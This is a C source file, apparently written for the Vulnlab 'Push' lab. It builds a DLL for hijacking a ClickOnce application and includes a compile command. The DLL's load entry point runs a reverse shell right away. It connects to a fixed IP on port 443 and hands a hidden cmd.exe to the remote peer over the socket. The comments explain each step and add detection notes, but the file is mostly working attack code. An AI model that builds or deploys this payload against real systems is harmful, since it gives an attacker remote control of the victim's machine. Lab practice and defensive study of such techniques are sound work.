DLL hijack in Clickonce app - Vulnlab Push
// Compile with MingW: x86_64-w64-mingw32-gcc-win32 reverse.c -shared -lws2_32 -o Hijack.dll.deploy | |
#include <winsock2.h> | |
#include <windows.h> | |
#include <io.h> | |
#include <process.h> | |
#include <sys/types.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
// RevShell: the payload this DLL runs when it is loaded.
// What the code below does, step by step:
//   1. initialises Winsock (version 2.2 requested via MAKEWORD(2,2));
//   2. creates a plain TCP socket and connects it to the hard-coded peer
//      192.168.110.121 on port 443 (an IP literal, so no DNS lookup; nothing
//      here negotiates TLS, 443 is only the port number);
//   3. starts "cmd" with its stdin, stdout and stderr all redirected to that
//      socket, so the remote peer drives an interactive shell.
// Returns 0 after CreateProcessA is issued, 1 if WSAStartup or connect fails.
// Failure text goes to file descriptor 2 via write(), not to the socket.
//
// Defender notes: the hijacked host application becomes the parent of a
// cmd.exe whose standard handles are a socket, and the host makes an outbound
// connection to a fixed IP:443 that carries cleartext. The literal
// "[ERROR] WSASturtup failed." (sic) is present in the compiled binary.
int RevShell() {
    WSADATA wsaData;
    // Winsock has to be initialised before any socket call in this process.
    if (WSAStartup(MAKEWORD(2 ,2), &wsaData) != 0) {
        write(2, "[ERROR] WSASturtup failed.\n", 27);
        return (1);
    }
    int port = 443;            // destination port, fixed at compile time
    struct sockaddr_in sa;
    // IPv4 stream socket over TCP; created with WSASocketA, no flags.
    SOCKET sockt = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = inet_addr("192.168.110.121");   // fixed C2 address
    // Blocking connect; any failure ends the payload here.
    if (connect(sockt, (struct sockaddr *) &sa, sizeof(sa)) != 0) {
        write(2, "[ERROR] connect failed.\n", 24);
        return (1);
    }
    STARTUPINFO sinfo;
    memset(&sinfo, 0, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    // STARTF_USESTDHANDLES makes CreateProcess honour the three handles below;
    // all of them are the connected socket, which is what ties the shell to
    // the network peer.
    sinfo.dwFlags = (STARTF_USESTDHANDLES);
    sinfo.hStdInput = (HANDLE)sockt;
    sinfo.hStdOutput = (HANDLE)sockt;
    sinfo.hStdError = (HANDLE)sockt;
    PROCESS_INFORMATION pinfo;
    // bInheritHandles = TRUE so the socket handle is visible to the child;
    // CREATE_NO_WINDOW keeps cmd from opening a console window.
    CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo);
    return (0);
}
// DllMain: entry point called by the Windows loader. The payload runs
// synchronously on DLL_PROCESS_ATTACH, i.e. the moment the hijacked
// application loads this DLL -- no exported function needs to be called by
// the host. DisableThreadLibraryCalls() turns off the per-thread
// attach/detach notifications; the remaining cases do nothing.
// Always returns TRUE, so the host sees a successful load whether or not
// RevShell() managed to connect.
// Defender notes: the Winsock init, the outbound connect and the
// CreateProcessA of cmd all happen inside the host's library-load path
// (under the loader lock), so they are attributable to the hijacked process
// and occur before it has done any of its own work.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        DisableThreadLibraryCalls(hModule);   // suppress DLL_THREAD_* callbacks for this module
        RevShell();                           // return value is discarded
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}